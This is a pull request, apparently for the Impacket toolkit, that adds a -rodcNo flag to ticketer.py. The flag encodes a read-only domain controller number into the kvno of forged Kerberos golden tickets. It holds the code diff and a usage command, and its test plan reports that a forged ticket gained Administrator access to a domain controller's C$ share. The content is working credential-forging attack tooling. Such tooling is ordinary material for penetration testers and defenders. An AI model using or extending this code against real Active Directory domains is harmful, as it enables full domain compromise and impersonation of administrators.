### PR TITLE
ticketer: add -rodcNo flag for RODC golden ticket support

### DIFF
--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -97,6 +97,7 @@ class TICKETER:
         self.__options = options
         self.__tgt = None
         self.__tgt_session_key = None
+        self.__rodcNo = getattr(options, 'rodcNo', None)
         if options.spn:
             spn = options.spn.split('/')
             self.__service = spn[0]
@@ -108,6 +109,14 @@ class TICKETER:
         else:
             self.__service = 'krbtgt'
             self.__server = self.__domain
+
+        if self.__rodcNo:
+            logging.info('RODC golden ticket mode: kvno will be encoded with RODC number %d' % self.__rodcNo)
+
+    def _encode_kvno(self, base_kvno):
+        if self.__rodcNo:
+            return (self.__rodcNo << 16) | base_kvno
+        return base_kvno
 
     @staticmethod
     def getFileTime(t):
@@ -438,7 +447,7 @@ class TICKETER:
                 kdcRep['ticket']['sname']['name-string'][1] = self.__server
 
             kdcRep['ticket']['enc-part'] = noValue
-            kdcRep['ticket']['enc-part']['kvno'] = 2
+            kdcRep['ticket']['enc-part']['kvno'] = self._encode_kvno(2)
             kdcRep['enc-part'] = noValue
             if self.__options.nthash is None:
                 if len(self.__options.aesKey) == 64:
@@ -451,7 +460,7 @@ class TICKETER:
                 kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
                 kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
 
-            kdcRep['enc-part']['kvno'] = 2
+            kdcRep['enc-part']['kvno'] = self._encode_kvno(2)
             kdcRep['enc-part']['cipher'] = noValue
 
         pacInfos = self.createBasicPac(kdcRep)
@@ -1049,7 +1058,7 @@ class TICKETER:
         cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)
 
         kdcRep['ticket']['enc-part']['cipher'] = cipherText
-        kdcRep['ticket']['enc-part']['kvno'] = 2
+        kdcRep['ticket']['enc-part']['kvno'] = self._encode_kvno(2)
 
         # Lastly.. we have to encrypt the kdcRep['enc-part'] part
         # with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?)
@@ -1074,7 +1083,7 @@ class TICKETER:
 
         kdcRep['enc-part']['cipher'] = cipherText
         kdcRep['enc-part']['etype'] = cipher.enctype
-        kdcRep['enc-part']['kvno'] = 1
+        kdcRep['enc-part']['kvno'] = self._encode_kvno(1)
 
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Final Golden Ticket')
@@ -1130,6 +1139,8 @@ if __name__ == '__main__':
                                                                              '(default = 24*365*10)')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-rodcNo', action='store', type=int, help='Number of the RODC krbtgt account '
+                        '(e.g. 8245 for krbtgt_8245). Encodes the RODC number into the ticket kvno')
 
     group = parser.add_argument_group('authentication')
 


### PR DESCRIPTION
## Summary
When forging a golden ticket using an RODC's krbtgt key, the ticket's kvno must
encode the RODC number in the high 16 bits so the writable DC can identify which
krbtgt key was used. Without this, the DC returns KRB_AP_ERR_BAD_INTEGRITY.

This adds a `-rodcNo` flag (matching the existing convention in secretsdump.py
and keylistattack.py) that encodes the kvno as `(rodcNo << 16) | key_version`.

Usage:
    ticketer.py -aesKey <rodc_krbtgt_aes> -domain-sid <SID> \
        -domain <FQDN> -rodcNo 8245 Administrator

No change in behavior when -rodcNo is not specified.

## Test plan
- [x] Tested against Windows Server 2019 DC + RODC environment
- [x] Forged TGT with krbtgt_8245 AES256 key and `-rodcNo 8245`
- [x] Writable DC accepted the ticket and issued a valid TGS for cifs/DC01
- [x] Used the TGS to access C$ as Administrator via smbclient